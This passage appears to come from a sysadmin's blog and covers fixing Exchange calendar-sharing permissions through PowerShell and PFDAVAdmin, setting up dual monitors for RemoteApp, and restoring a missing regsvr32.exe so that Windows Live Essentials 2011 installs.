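# Create a mail-enabled (universal) security group for the calendar viewers
New-DistributionGroup -Name "Calendar Reviewers" -Type Security -OrganizationalUnit "example.local/Groups" -SamAccountName CalendarReviewers

# Add each manager to the group
Add-DistributionGroupMember -Identity "Calendar Reviewers" -Member john.doe
```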

I had to change a few things to resolve this, and I still don’t know what caused it to begin with.

First, using PFDAVAdmin, I verified that the user did not have permissions set on the calendar object that were lower than those of the group.  For example, for some reason my user had only the “Folder Visible” permission, while the group he was a member of had the “Reviewer” permission (an explicit individual entry takes precedence over a group entry).  Why he had “Folder Visible” to begin with is another story, but I removed his individual account from the DACL.

Next, I had to modify the “Freebusy Data” object in the user’s mailbox.  For some reason adding users/groups to the DACL of the calendar object wasn’t automatically updating the Free/Busy object.  I went into this object in each user’s mailbox and again added the group and granted them the “Reviewer” permission.  This fixed the problem with shared calendar data not appearing in Outlook and got rid of the error message.

A side note: I found that some users attempted to share their calendar with “Everyone”, which resulted in the “Folder Visible” permission assigned to “\Everyone” in the DACL within PFDAVAdmin.  This caused strange things to happen, such as shared calendars opening and displaying data, yet the user received the “insufficient permission” error from above.  I removed “Everyone” from the DACL (or changed the permission to “Reviewer”), and this made those problems go away.


How to use PFDAVAdmin:

1. Open program and click File –> Connect

2. Input the mailbox server’s name in “Exchange Server” field and a DC with the Global Catalog in the “Global Catalog” field

3. Under Connection, select “All Mailboxes”.  Click OK.

4. Expand the mailbox of the user you’re working on.  The “Freebusy data” object is directly below the user.  To edit the DACL, right-click the object and select “Folder Permissions”.

5. Click “Add” in the “Permissions” window.  Type the name of the mailbox you wish to add permissions for (e.g., john.doe if I’m giving John Doe reviewer access to the selected mailbox).  Click “Search” to find the user, then click OK.

6. Select the user in the name list (back in the Permissions window), then select the desired permissions in the drop-down box.  Then click “Commit Changes”.

The “Calendar” object can be found under the “Top of Information Store” object in the user’s mailbox.

RemoteApp Dual Monitor Setup

RemoteApp is a cool feature of Windows Server 2008/2008 R2 that allows a user to establish a remote session with just the application they’re working with.  Multiple applications can be used at once (on one remote server or several).  This technology is called “presentation virtualization”.  Citrix offers the same capability, but Citrix is also fairly pricey.

A number of months back, I set up a RemoteApp server (with the RD Web Access feature, which lets users launch RemoteApp programs from a web browser anywhere they go) for an employee who was moving but would still be working with the company.  I was tasked with setting her up to work remotely.  Given my minuscule budget, this was one of my only options: a direct connection back to the office (or even internet connections at both the remote worker’s home and the office) fast enough to support transferring the files we work with daily was just too darn expensive.

One of the things my co-workers enjoy is the ability to use dual monitors to work more productively.  This is possible with RemoteApp as well, but there are a few requirements for it to work:

  1. All monitors must be the same resolution.
  2. The upper-left monitor (or just the left one, if you only have two) must be the “primary display”.  This can be set in the screen resolution settings.
  3. The total combined resolution of all monitors must not exceed 4096×2048 (4096 across by 2048 high).
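On the client side, monitor spanning can also be requested explicitly, either by launching the Remote Desktop client with the span switch (mstsc /span) or by adding the equivalent property to the saved connection file.  A sketch of the .rdp settings involved; verify the exact property names against your client version:

```
screen mode id:i:2
span monitors:i:1
```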

I had a user today who was unable to use both of her displays with the RemoteApp server.  I checked the settings listed above, and all were correct.  However, it appears that you need a recent enough version of the Remote Desktop Connection client (mstsc.exe) to properly span multiple monitors in a RemoteApp session, and for whatever reason this user was running an outdated version.  I installed KB969084 on her machine, rebooted, and multiple monitors worked like a champ.  Now to figure out why WSUS didn’t install that update automatically on her machine…

Trouble Installing Windows Live Essentials 2011 <Solved>

Ironically enough, I downloaded Windows Live Essentials 2011 on my work PC to write another blog post about something (that I’ll hopefully get to later).  I had a hell of a time installing WLE.  I kept receiving an error from the installer.  It said: Error 0x80070643. Source: wllogin-amd64.

I tried lots of different things to resolve this issue.  The event log showed that the installer couldn’t register a certain DLL file.  Knowing this, I copied the needed file from my home PC and tried to register it manually.  I should have known something was off when regsvr32.exe produced no message at all when I registered the DLL.  However, I continued on: installing, uninstalling, compatibility mode, disabling A/V, etc.

Finally, when I had just about given up, I browsed to my SysWOW64 folder (I’m running Win7 x64) and looked for regsvr32.exe, the program the event log was complaining about.  I had assumed that the DLL file the installer was trying to register couldn’t be located; I hadn’t considered that regsvr32.exe itself might be missing.  Sure enough, regsvr32.exe was not in my SysWOW64 folder; instead, I had a regsvr32.exe.DEL file.  I had removed a virus from this PC a few weeks back; perhaps that cleanup renamed this crucial Windows file.

I removed the .DEL extension, then removed all remnants of WLE (using the Windows Installer CleanUp Utility and manually deleting the WLE Program Files folder), and re-installed WLE.  It appeared to install all the way through this time; however, the event log showed informational events (not errors) suggesting that the Windows Live ID Sign-In Assistant was having trouble installing (this is the component the problematic DLL belongs to).  When I launched Writer, the splash screen would display for a few seconds, then close, and the process would end.  To fix this once and for all, I ran a repair install of WLE, which seems to have permanently resolved the issue.
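From an elevated command prompt, restoring the renamed file amounts to the following (paths assume a default Windows installation):

```bat
rem Restore the renamed system file (64-bit Windows; use C:\Windows\System32 on 32-bit)
cd /d C:\Windows\SysWOW64
ren regsvr32.exe.DEL regsvr32.exe
```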

TL;DR – If you’re running 64-bit Windows, make sure regsvr32.exe exists in the SysWOW64 folder (or in System32, if you’re running 32-bit).

EDIT: If you’re attempting to troubleshoot a WLE problem, it may be less time-consuming to download and install the offline installer rather than using the web setup, as the web setup will attempt to download the various components each time.  The download is about 155 MB.  Located here: